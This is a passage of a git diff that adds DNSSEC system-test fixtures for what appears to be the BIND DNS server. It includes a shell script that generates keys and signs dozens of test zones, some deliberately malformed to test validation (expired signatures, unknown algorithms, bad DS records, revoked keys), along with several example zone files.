+infile=bogus.example.db.in +zonefile=bogus.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +zone=dynamic.example. +infile=dynamic.example.db.in +zonefile=dynamic.example.db + +keyname1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +keyname2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") + +cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +zone=keyless.example. +infile=generic.example.db.in +zonefile=keyless.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# Change the signer field of the a.b.keyless.example RRSIG A +# to point to a provably nonexistent DNSKEY record. +zonefiletmp=$(mktemp "$zonefile.XXXXXX") || exit 1 +mv "$zonefile.signed" "$zonefiletmp" +<"$zonefiletmp" "$PERL" -p -e 's/ keyless.example/ b.keyless.example/ + if /^a.b.keyless.example/../A RRSIG NSEC/;' > "$zonefile.signed" +rm -f "$zonefiletmp" + +# +# NSEC3/NSEC test zone +# +zone=secure.nsec3.example. +infile=secure.nsec3.example.db.in +zonefile=secure.nsec3.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# NSEC3/NSEC3 test zone +# +zone=nsec3.nsec3.example. +infile=nsec3.nsec3.example.db.in +zonefile=nsec3.nsec3.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" "$zonefile" > /dev/null + +# +# OPTOUT/NSEC3 test zone +# +zone=optout.nsec3.example. 
+infile=optout.nsec3.example.db.in +zonefile=optout.nsec3.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -A -o "$zone" "$zonefile" > /dev/null + +# +# A nsec3 zone (non-optout). +# +zone=nsec3.example. +infile=nsec3.example.db.in +zonefile=nsec3.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -g -3 - -o "$zone" "$zonefile" > /dev/null + +# +# OPTOUT/NSEC test zone +# +zone=secure.optout.example. +infile=secure.optout.example.db.in +zonefile=secure.optout.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# OPTOUT/NSEC3 test zone +# +zone=nsec3.optout.example. +infile=nsec3.optout.example.db.in +zonefile=nsec3.optout.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" "$zonefile" > /dev/null + +# +# OPTOUT/OPTOUT test zone +# +zone=optout.optout.example. +infile=optout.optout.example.db.in +zonefile=optout.optout.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -A -o "$zone" "$zonefile" > /dev/null + +# +# A optout nsec3 zone. +# +zone=optout.example. +infile=optout.example.db.in +zonefile=optout.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -g -3 - -A -o "$zone" "$zonefile" > /dev/null + +# +# A nsec3 zone (non-optout) with unknown nsec3 hash algorithm (-U). +# +zone=nsec3-unknown.example. 
+infile=nsec3-unknown.example.db.in +zonefile=nsec3-unknown.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -U -o "$zone" "$zonefile" > /dev/null + +# +# A optout nsec3 zone with a unknown nsec3 hash algorithm (-U). +# +zone=optout-unknown.example. +infile=optout-unknown.example.db.in +zonefile=optout-unknown.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -U -A -o "$zone" "$zonefile" > /dev/null + +# +# A zone that is signed with an unknown DNSKEY algorithm. +# Algorithm 7 is replaced by 100 in the zone and dsset. +# +zone=dnskey-unknown.example +infile=dnskey-unknown.example.db.in +zonefile=dnskey-unknown.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" -O full -f ${zonefile}.tmp "$zonefile" > /dev/null + +awk '$4 == "DNSKEY" { $7 = 100 } $4 == "RRSIG" { $6 = 100 } { print }' ${zonefile}.tmp > ${zonefile}.signed + +DSFILE="dsset-${zone}${TP}" +$DSFROMKEY -A -f ${zonefile}.signed "$zone" > "$DSFILE" + +# +# A zone that is signed with an unsupported DNSKEY algorithm (3). +# Algorithm 7 is replaced by 255 in the zone and dsset. 
+# +zone=dnskey-unsupported.example +infile=dnskey-unsupported.example.db.in +zonefile=dnskey-unsupported.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" -O full -f ${zonefile}.tmp "$zonefile" > /dev/null + +awk '$4 == "DNSKEY" { $7 = 255 } $4 == "RRSIG" { $6 = 255 } { print }' ${zonefile}.tmp > ${zonefile}.signed + +DSFILE="dsset-${zone}${TP}" +$DSFROMKEY -A -f ${zonefile}.signed "$zone" > "$DSFILE" + +# +# A zone with a published unsupported DNSKEY algorithm (Reserved). +# Different from above because this key is not intended for signing. +# +zone=dnskey-unsupported-2.example +infile=dnskey-unsupported-2.example.db.in +zonefile=dnskey-unsupported-2.example.db + +ksk=$("$KEYGEN" -f KSK -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +zsk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$ksk.key" "$zsk.key" unsupported-algorithm.key > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" -f ${zonefile}.signed "$zonefile" > /dev/null + +# +# A zone with a unknown DNSKEY algorithm + unknown NSEC3 hash algorithm (-U). +# Algorithm 7 is replaced by 100 in the zone and dsset. +# +zone=dnskey-nsec3-unknown.example +infile=dnskey-nsec3-unknown.example.db.in +zonefile=dnskey-nsec3-unknown.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -3 - -o "$zone" -U -O full -f ${zonefile}.tmp "$zonefile" > /dev/null + +awk '$4 == "DNSKEY" { $7 = 100; print } $4 == "RRSIG" { $6 = 100; print } { print }' ${zonefile}.tmp > ${zonefile}.signed + +DSFILE="dsset-${zone}${TP}" +$DSFROMKEY -A -f ${zonefile}.signed "$zone" > "$DSFILE" + +# +# A multiple parameter nsec3 zone. +# +zone=multiple.example. 
+infile=multiple.example.db.in +zonefile=multiple.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null +mv "$zonefile".signed "$zonefile" +"$SIGNER" -P -u3 - -o "$zone" "$zonefile" > /dev/null +mv "$zonefile".signed "$zonefile" +"$SIGNER" -P -u3 AAAA -o "$zone" "$zonefile" > /dev/null +mv "$zonefile".signed "$zonefile" +"$SIGNER" -P -u3 BBBB -o "$zone" "$zonefile" > /dev/null +mv "$zonefile".signed "$zonefile" +"$SIGNER" -P -u3 CCCC -o "$zone" "$zonefile" > /dev/null +mv "$zonefile".signed "$zonefile" +"$SIGNER" -P -u3 DDDD -o "$zone" "$zonefile" > /dev/null + +# +# A RSASHA256 zone. +# +zone=rsasha256.example. +infile=rsasha256.example.db.in +zonefile=rsasha256.example.db + +keyname=$("$KEYGEN" -q -a RSASHA256 -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# A RSASHA512 zone. +# +zone=rsasha512.example. +infile=rsasha512.example.db.in +zonefile=rsasha512.example.db + +keyname=$("$KEYGEN" -q -a RSASHA512 -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# A zone with the DNSKEY set only signed by the KSK +# +zone=kskonly.example. +infile=kskonly.example.db.in +zonefile=kskonly.example.db + +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -x -o "$zone" "$zonefile" > /dev/null + +# +# A zone with the expired signatures +# +zone=expired.example. 
+infile=expired.example.db.in +zonefile=expired.example.db + +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -o "$zone" -s -1d -e +1h "$zonefile" > /dev/null +rm -f "$kskname.*" "$zskname.*" + +# +# A NSEC3 signed zone that will have a DNSKEY added to it via UPDATE. +# +zone=update-nsec3.example. +infile=update-nsec3.example.db.in +zonefile=update-nsec3.example.db + +kskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -3 - -o "$zone" "$zonefile" > /dev/null + +# +# A NSEC signed zone that will have auto-dnssec enabled and +# extra keys not in the initial signed zone. +# +zone=auto-nsec.example. +infile=auto-nsec.example.db.in +zonefile=auto-nsec.example.db + +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# A NSEC3 signed zone that will have auto-dnssec enabled and +# extra keys not in the initial signed zone. +# +zone=auto-nsec3.example. 
+infile=auto-nsec3.example.db.in +zonefile=auto-nsec3.example.db + +kskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +kskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -3 - -o "$zone" "$zonefile" > /dev/null + +# +# Secure below cname test zone. +# +zone=secure.below-cname.example. +infile=secure.below-cname.example.db.in +zonefile=secure.below-cname.example.db +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$keyname.key" > "$zonefile" +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null + +# +# Patched TTL test zone. +# +zone=ttlpatch.example. +infile=ttlpatch.example.db.in +zonefile=ttlpatch.example.db +signedfile=ttlpatch.example.db.signed +patchedfile=ttlpatch.example.db.patched + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -f $signedfile -o "$zone" "$zonefile" > /dev/null +$CHECKZONE -D -s full "$zone" $signedfile 2> /dev/null | \ + awk '{$2 = "3600"; print}' > $patchedfile + +# +# Separate DNSSEC records. +# +zone=split-dnssec.example. +infile=split-dnssec.example.db.in +zonefile=split-dnssec.example.db +signedfile=split-dnssec.example.db.signed + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$keyname.key" > "$zonefile" +echo "\$INCLUDE \"$signedfile\"" >> "$zonefile" +: > "$signedfile" +"$SIGNER" -P -D -o "$zone" "$zonefile" > /dev/null + +# +# Separate DNSSEC records smart signing. +# +zone=split-smart.example. 
+infile=split-smart.example.db.in +zonefile=split-smart.example.db +signedfile=split-smart.example.db.signed + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cp "$infile" "$zonefile" +# shellcheck disable=SC2016 +echo "\$INCLUDE \"$signedfile\"" >> "$zonefile" +: > "$signedfile" +"$SIGNER" -P -S -D -o "$zone" "$zonefile" > /dev/null + +# +# Zone with signatures about to expire, but no private key to replace them +# +zone="expiring.example." +infile="expiring.example.db.in" +zonefile="expiring.example.db" +signedfile="expiring.example.db.signed" +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +cp "$infile" "$zonefile" +"$SIGNER" -S -e now+1mi -o "$zone" "$zonefile" > /dev/null +mv -f "${zskname}.private" "${zskname}.private.moved" +mv -f "${kskname}.private" "${kskname}.private.moved" + +# +# A zone where the signer's name has been forced to uppercase. +# +zone="upper.example." +infile="upper.example.db.in" +zonefile="upper.example.db" +lower="upper.example.db.lower" +signedfile="upper.example.db.signed" +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +cp "$infile" "$zonefile" +"$SIGNER" -P -S -o "$zone" -f $lower "$zonefile" > /dev/null +$CHECKZONE -D upper.example $lower 2>/dev/null | \ + sed '/RRSIG/s/ upper.example. / UPPER.EXAMPLE. /' > $signedfile + +# +# Check that the signer's name is in lower case when zone name is in +# upper case. +# +zone="LOWER.EXAMPLE." 
+infile="lower.example.db.in" +zonefile="lower.example.db" +signedfile="lower.example.db.signed" +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +cp "$infile" "$zonefile" +"$SIGNER" -P -S -o "$zone" "$zonefile" > /dev/null + +# +# Zone with signatures about to expire, and dynamic, but configured +# not to resign with 'auto-resign no;' +# +zone="nosign.example." +infile="nosign.example.db.in" +zonefile="nosign.example.db" +signedfile="nosign.example.db.signed" +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +cp "$infile" "$zonefile" +"$SIGNER" -S -e "now+1mi" -o "$zone" "$zonefile" > /dev/null +# preserve a normalized copy of the NS RRSIG for comparison later +$CHECKZONE -D nosign.example nosign.example.db.signed 2>/dev/null | \ + awk '$4 == "RRSIG" && $5 == "NS" {$2 = ""; print}' | \ + sed 's/[ ][ ]*/ /g'> ../nosign.before + +# +# An inline signing zone +# +zone=inline.example. +kskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") + +# +# publish a new key while deactivating another key at the same time. 
+# +zone=publish-inactive.example +infile=publish-inactive.example.db.in +zonefile=publish-inactive.example.db +now=$(date -u +%Y%m%d%H%M%S) +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +kskname=$("$KEYGEN" -P "$now+90s" -A "$now+3600s" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +kskname=$("$KEYGEN" -I "$now+90s" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cp "$infile" "$zonefile" +"$SIGNER" -S -o "$zone" "$zonefile" > /dev/null + +# +# A zone which will change its sig-validity-interval +# +zone=siginterval.example +infile=siginterval.example.db.in +zonefile=siginterval.example.db +kskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -fk "$zone") +zskname=$("$KEYGEN" -q -3 -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cp "$infile" "$zonefile" + +# +# A zone with a bad DS in the parent +# (sourced from bogus.example.db.in) +# +zone=badds.example. +infile=bogus.example.db.in +zonefile=badds.example.db + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null +sed -e 's/bogus/badds/g' < dsset-bogus.example$TP > dsset-badds.example$TP + +# +# A zone with future signatures. +# +zone=future.example +infile=future.example.db.in +zonefile=future.example.db +kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile" +"$SIGNER" -P -s +3600 -o "$zone" "$zonefile" > /dev/null +cp -f "$kskname.key" trusted-future.key + +# +# A zone with future signatures. 
+#
+zone=managed-future.example
+infile=managed-future.example.db.in
+zonefile=managed-future.example.db
+kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone")
+zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone")
+cat "$infile" "$kskname.key" "$zskname.key" > "$zonefile"
+"$SIGNER" -P -s +3600 -o "$zone" "$zonefile" > /dev/null
+
+#
+# A zone with a revoked key
+#
+zone=revkey.example.
+infile=generic.example.db.in
+zonefile=revkey.example.db
+
+ksk1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -3fk "$zone")
+ksk1=$("$REVOKE" "$ksk1")
+ksk2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -3fk "$zone")
+zsk1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -3 "$zone")
+
+cat "$infile" "${ksk1}.key" "${ksk2}.key" "${zsk1}.key" > "$zonefile"
+"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null
+
+#
+# Check that NSEC3 are correctly signed and returned from below a DNAME
+#
+zone=dname-at-apex-nsec3.example
+infile=dname-at-apex-nsec3.example.db.in
+zonefile=dname-at-apex-nsec3.example.db
+
+kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -3fk "$zone")
+zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -3 "$zone")
+cat "$infile" "${kskname}.key" "${zskname}.key" >"$zonefile"
+"$SIGNER" -P -3 - -o "$zone" "$zonefile" > /dev/null
+
+#
+# A NSEC zone with occuded data at the delegation
+#
+zone=occluded.example
+infile=occluded.example.db.in
+zonefile=occluded.example.db
+kskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -fk "$zone")
+zskname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" "$zone")
+dnskeyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -fk "delegation.$zone")
+keyname=$("$KEYGEN" -q -a DH -b 1024 -n HOST -T KEY "delegation.$zone")
+$DSFROMKEY "$dnskeyname.key" > "dsset-delegation.${zone}$TP"
+cat "$infile" "${kskname}.key" "${zskname}.key" "${keyname}.key" \
+ "${dnskeyname}.key" "dsset-delegation.${zone}$TP" >"$zonefile"
+"$SIGNER" -P -o "$zone" "$zonefile" > /dev/null
diff --git a/bin/tests/system/dnssec/ns3/split-dnssec.example.db.in b/bin/tests/system/dnssec/ns3/split-dnssec.example.db.in
new file mode 100644
index 0000000..55b3877
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/split-dnssec.example.db.in
@@ -0,0 +1,38 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a A 10.0.0.3
+*.wild A 10.0.0.6
+child NS ns2.example.
+insecure NS ns.insecure
+ns.insecure A 10.53.0.3
+secure NS ns.secure
+ns.secure A 10.53.0.3
+nsec3 NS ns.nsec3
+ns.nsec3 A 10.53.0.3
+optout NS ns.optout
+ns.optout A 10.53.0.3
+02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17
diff --git a/bin/tests/system/dnssec/ns3/split-smart.example.db.in b/bin/tests/system/dnssec/ns3/split-smart.example.db.in
new file mode 100644
index 0000000..55b3877
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/split-smart.example.db.in
@@ -0,0 +1,38 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a A 10.0.0.3
+*.wild A 10.0.0.6
+child NS ns2.example.
+insecure NS ns.insecure
+ns.insecure A 10.53.0.3
+secure NS ns.secure
+ns.secure A 10.53.0.3
+nsec3 NS ns.nsec3
+ns.nsec3 A 10.53.0.3
+optout NS ns.optout
+ns.optout A 10.53.0.3
+02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17
diff --git a/bin/tests/system/dnssec/ns3/ttlpatch.example.db.in b/bin/tests/system/dnssec/ns3/ttlpatch.example.db.in
new file mode 100644
index 0000000..14971bd
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/ttlpatch.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
diff --git a/bin/tests/system/dnssec/ns3/unsupported-algorithm.key b/bin/tests/system/dnssec/ns3/unsupported-algorithm.key
new file mode 100644
index 0000000..cc8bb9a
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/unsupported-algorithm.key
@@ -0,0 +1 @@
+dnskey-unsupported-2.example. IN DNSKEY 257 3 255 BJ0eV4dQC0pihdFXiVdlXjPDkzbv4fC+opEvK0RaDU7LLwFXPAi6DOc6tm7vcSr5Tgdnpoal3S4WqHuVw6I1pzy5mPPIZ3OpLSY/QeOyGc2QRAZtOXxiGxERHRjyAk7emlgGscM0Vty2oJVYRgTPX0lTwKX/V2H+mjEgp7u3tyG3cj5XBUQ8J0KUoqkrn1ZKrizH27aWiDaBUvqxJUcotaDhnydkNtcHoQIedm2b4qbyTQsdRkddJiSWxpveEcj3AMdt2PjU6Q4rgSWOc5ylPnW/O+GqqCEAkalGSF7ud0Nl3FVVR9iGwV/73FHzpBLawfkcHaODFmKRjzGqok8giKCih2vdNsxlx7gdJWJIPYYx/ZqNGc2ewzuAnnleJpZdXFo8uL3HYk6Pl51sSkfVUmcn/SM+ ;{id = 38688 (ksk), size = 768b}
diff --git a/bin/tests/system/dnssec/ns3/update-nsec3.example.db.in b/bin/tests/system/dnssec/ns3/update-nsec3.example.db.in
new file mode 100644
index 0000000..a7792fd
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/update-nsec3.example.db.in
@@ -0,0 +1,40 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
+nosoa NS ns.nosoa
+ns.nosoa A 10.53.0.7
+
+normalthenrrsig A 10.0.0.28
+rrsigonly A 10.0.0.29
diff --git a/bin/tests/system/dnssec/ns3/upper.example.db.in b/bin/tests/system/dnssec/ns3/upper.example.db.in
new file mode 100644
index 0000000..ec6603a
--- /dev/null
+++ b/bin/tests/system/dnssec/ns3/upper.example.db.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2012042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+@ NS ns
+ns A 10.53.0.3
